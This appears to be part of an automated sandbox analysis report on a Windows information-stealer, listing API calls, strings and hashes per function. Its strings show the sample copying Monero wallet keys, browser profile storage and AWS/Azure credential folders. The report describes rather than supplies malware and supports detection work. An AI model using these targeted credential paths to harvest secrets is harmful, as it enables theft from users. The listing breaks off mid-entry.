                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006A201A
                                • lstrcpy.KERNEL32(00000000,?), ref: 006A2042
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006A204D
                                • lstrlen.KERNEL32(006D1794), ref: 006A2058
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A2075
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006A2081
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A20AC
                                • lstrlen.KERNEL32(?), ref: 006A20E4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A2104
                                • lstrcat.KERNEL32(00000000,?), ref: 006A2112
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A2139
                                • lstrlen.KERNEL32(006D1794), ref: 006A214B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A216B
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006A2177
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A219D
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006A21A8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A21D4
                                • lstrlen.KERNEL32(?), ref: 006A21EA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A220A
                                • lstrcat.KERNEL32(00000000,?), ref: 006A2218
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A2242
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006A227F
                                • lstrlen.KERNEL32(0133D7E0), ref: 006A228D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A22B1
                                • lstrcat.KERNEL32(00000000,0133D7E0), ref: 006A22B9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A22F7
                                • lstrcat.KERNEL32(00000000), ref: 006A2304
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A232D
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 006A2356
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A2382
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A23BF
                                • DeleteFileA.KERNEL32(00000000), ref: 006A23F7
                                • FindNextFileA.KERNEL32(00000000,?), ref: 006A2444
                                • FindClose.KERNEL32(00000000), ref: 006A2453
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                                • String ID:
                                • API String ID: 2857443207-0
                                • Opcode ID: e7ab9dd5a70ac078925b0c04ffca83aeb68fd6df9af1a357d4f7041b201f6c04
                                • Instruction ID: 67afb65a3ed25fb55be20989e58f3ba3a6afddb0ddc828045a8340ed27d9bb8c
                                • Opcode Fuzzy Hash: e7ab9dd5a70ac078925b0c04ffca83aeb68fd6df9af1a357d4f7041b201f6c04
                                • Instruction Fuzzy Hash: 73E17E70A512179BCB61FF69DC95AEEB7BABF06300F044169F909A7221DB34DD018FA4
                                Function 006B6410 Relevance: 52.9, APIs: 29, Strings: 1, Instructions: 438stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B6445
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B6480
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 006B64AA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B64E1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B6506
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B650E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B6537
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$FolderPathlstrcat
                                • String ID: \..\
                                • API String ID: 2938889746-4220915743
                                • Opcode ID: e0a5d9b9757467fcd9e64a1262d270284e2a756e1918aab84d970960a0044743
                                • Instruction ID: a8ce0aeaedcf3670e90b8824f5ba34fc0db0c6b589d87fe12f96c3fb23f7c000
                                • Opcode Fuzzy Hash: e0a5d9b9757467fcd9e64a1262d270284e2a756e1918aab84d970960a0044743
                                • Instruction Fuzzy Hash: 6DF1BCB1A112169BCB21AF69D859AEE77B6BF01300F04416DF85AD7361EB38DC81CF94
                                Function 006B4370 Relevance: 49.3, APIs: 26, Strings: 2, Instructions: 334stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B43A3
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B43D6
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B43FE
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B4409
                                • lstrlen.KERNEL32(\storage\default\), ref: 006B4414
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B4431
                                • lstrcat.KERNEL32(00000000,\storage\default\), ref: 006B443D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B4466
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B4471
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B4498
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B44D7
                                • lstrcat.KERNEL32(00000000,?), ref: 006B44DF
                                • lstrlen.KERNEL32(006D1794), ref: 006B44EA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B4507
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006B4513
                                • lstrlen.KERNEL32(.metadata-v2), ref: 006B451E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B453B
                                • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 006B4547
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B456E
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B45A0
                                • GetFileAttributesA.KERNEL32(00000000), ref: 006B45A7
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B4601
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B462A
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B4653
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B467B
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B46AF
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                                • String ID: .metadata-v2$\storage\default\
                                • API String ID: 1033685851-762053450
                                • Opcode ID: 3b41386bde6faae4789dc23a0e98bf5c305ded8c6afd6c5b73be8f343599edf6
                                • Instruction ID: 86318799018908d2748489617a9814d910795437acb8c6c407f29868412e2efd
                                • Opcode Fuzzy Hash: 3b41386bde6faae4789dc23a0e98bf5c305ded8c6afd6c5b73be8f343599edf6
                                • Instruction Fuzzy Hash: 99B17AB1A116169BCB21BF79D859AEE77AAAF01700F04012DF84AE7752EF34DC418B94
                                Function 006B57A0 Relevance: 45.5, APIs: 30, Instructions: 486stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B57D5
                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 006B5804
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B5835
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B585D
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B5868
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B5890
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B58C8
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B58D3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B58F8
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B592E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B5956
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B5961
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B5988
                                • lstrlen.KERNEL32(006D1794), ref: 006B599A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B59B9
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006B59C5
                                • lstrlen.KERNEL32(0133D708), ref: 006B59D4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B59F7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B5A02
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B5A2C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B5A58
                                • GetFileAttributesA.KERNEL32(00000000), ref: 006B5A5F
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B5AB7
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B5B2D
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B5B56
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B5B89
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B5BB5
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B5BEF
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B5C4C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B5C70
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                                • String ID:
                                • API String ID: 2428362635-0
                                • Opcode ID: 3edd46680fc4bda2fbf6bc7008f45b1b23b61fa8aded9d9ba9f97874365a134a
                                • Instruction ID: a835a4c0816d1e2aa212504569cfdb0ed7ace5fdb3816228e3d254954a962aeb
                                • Opcode Fuzzy Hash: 3edd46680fc4bda2fbf6bc7008f45b1b23b61fa8aded9d9ba9f97874365a134a
                                • Instruction Fuzzy Hash: B002B2B0A116169BCB21FF69D899AEEB7B6BF04300F04416DF94AA7350DB34DC818F94
                                Function 006A1190 Relevance: 42.3, APIs: 22, Strings: 2, Instructions: 280stringfileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 006A1120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 006A1135
                                  • Part of subcall function 006A1120: RtlAllocateHeap.NTDLL(00000000), ref: 006A113C
                                  • Part of subcall function 006A1120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 006A1159
                                  • Part of subcall function 006A1120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 006A1173
                                  • Part of subcall function 006A1120: RegCloseKey.ADVAPI32(?), ref: 006A117D
                                • lstrcat.KERNEL32(?,00000000), ref: 006A11C0
                                • lstrlen.KERNEL32(?), ref: 006A11CD
                                • lstrcat.KERNEL32(?,.keys), ref: 006A11E8
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006A121F
                                • lstrlen.KERNEL32(01339358), ref: 006A122D
                                • lstrcpy.KERNEL32(00000000,?), ref: 006A1251
                                • lstrcat.KERNEL32(00000000,01339358), ref: 006A1259
                                • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 006A1264
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A1288
                                • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 006A1294
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A12BA
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006A12FF
                                • lstrlen.KERNEL32(0133D7E0), ref: 006A130E
                                • lstrcpy.KERNEL32(00000000,?), ref: 006A1335
                                • lstrcat.KERNEL32(00000000,?), ref: 006A133D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A1378
                                • lstrcat.KERNEL32(00000000), ref: 006A1385
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A13AC
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 006A13D5
                                • lstrcpy.KERNEL32(00000000,?), ref: 006A1401
                                • lstrcpy.KERNEL32(00000000,?), ref: 006A143D
                                  • Part of subcall function 006BEDE0: lstrcpy.KERNEL32(00000000,?), ref: 006BEE12
                                • DeleteFileA.KERNEL32(?), ref: 006A1471
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                                • String ID: .keys$\Monero\wallet.keys
                                • API String ID: 2881711868-3586502688
                                • Opcode ID: c73d4736743b78eafe6648618b9924c9a8630179a0e36f2620d9d3fa6f0489d6
                                • Instruction ID: c08793fc396b990ab7d02cb3f7ca700748c2f44bbeea32f0fb74163d3f4a9264
                                • Opcode Fuzzy Hash: c73d4736743b78eafe6648618b9924c9a8630179a0e36f2620d9d3fa6f0489d6
                                • Instruction Fuzzy Hash: B3A1C171A112069BCB21FF79DC59ADEB7BAAF06300F040169F909EB211EB34DE418F94
                                Function 006BE720 Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 199stringCOMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 006BE740
                                • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 006BE769
                                • lstrcpy.KERNEL32(00000000,?), ref: 006BE79F
                                • lstrcat.KERNEL32(?,00000000), ref: 006BE7AD
                                • lstrcat.KERNEL32(?,\.azure\), ref: 006BE7C6
                                • memset.MSVCRT ref: 006BE805
                                • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 006BE82D
                                • lstrcpy.KERNEL32(00000000,?), ref: 006BE85F
                                • lstrcat.KERNEL32(?,00000000), ref: 006BE86D
                                • lstrcat.KERNEL32(?,\.aws\), ref: 006BE886
                                • memset.MSVCRT ref: 006BE8C5
                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 006BE8F1
                                • lstrcpy.KERNEL32(00000000,?), ref: 006BE920
                                • lstrcat.KERNEL32(?,00000000), ref: 006BE92E
                                • lstrcat.KERNEL32(?,\.IdentityService\), ref: 006BE947
                                • memset.MSVCRT ref: 006BE986
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$memset$FolderPathlstrcpy
                                • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                • API String ID: 4067350539-3645552435
                                • Opcode ID: e4ca8ec75b9abbee7e15aaf3e0c9f9bee898a51440a0439aea25c1331f1f6189
                                • Instruction ID: a031dc9c6d5493817ca4744d3711bdc171d9d7f5b4401a8aa2476e526fe6a704
                                • Opcode Fuzzy Hash: e4ca8ec75b9abbee7e15aaf3e0c9f9bee898a51440a0439aea25c1331f1f6189
                                • Instruction Fuzzy Hash: 3A71D5B1E40219ABDB61FB64DC46FED7375AF48700F0104A9F7199B191DE709E848F98
                                Function 006BABB2 Relevance: 39.3, APIs: 25, Strings: 1, Instructions: 297stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32 ref: 006BABCF
                                • lstrlen.KERNEL32(0133EB48), ref: 006BABE5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006BAC0D
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006BAC18
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006BAC41
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006BAC84
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006BAC8E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006BACB7
                                • lstrlen.KERNEL32(006D4AD4), ref: 006BACD1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006BACF3
                                • lstrcat.KERNEL32(00000000,006D4AD4), ref: 006BACFF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006BAD28
                                • lstrlen.KERNEL32(006D4AD4), ref: 006BAD3A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006BAD5C
                                • lstrcat.KERNEL32(00000000,006D4AD4), ref: 006BAD68
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006BAD91
                                • lstrlen.KERNEL32(0133E9F8), ref: 006BADA7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006BADCF
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006BADDA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006BAE03
                                • lstrcpy.KERNEL32(00000000,?), ref: 006BAE3F
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006BAE49
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006BAE6F
                                • lstrlen.KERNEL32(00000000), ref: 006BAE85
                                • lstrcpy.KERNEL32(00000000,0133EB78), ref: 006BAEB8
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
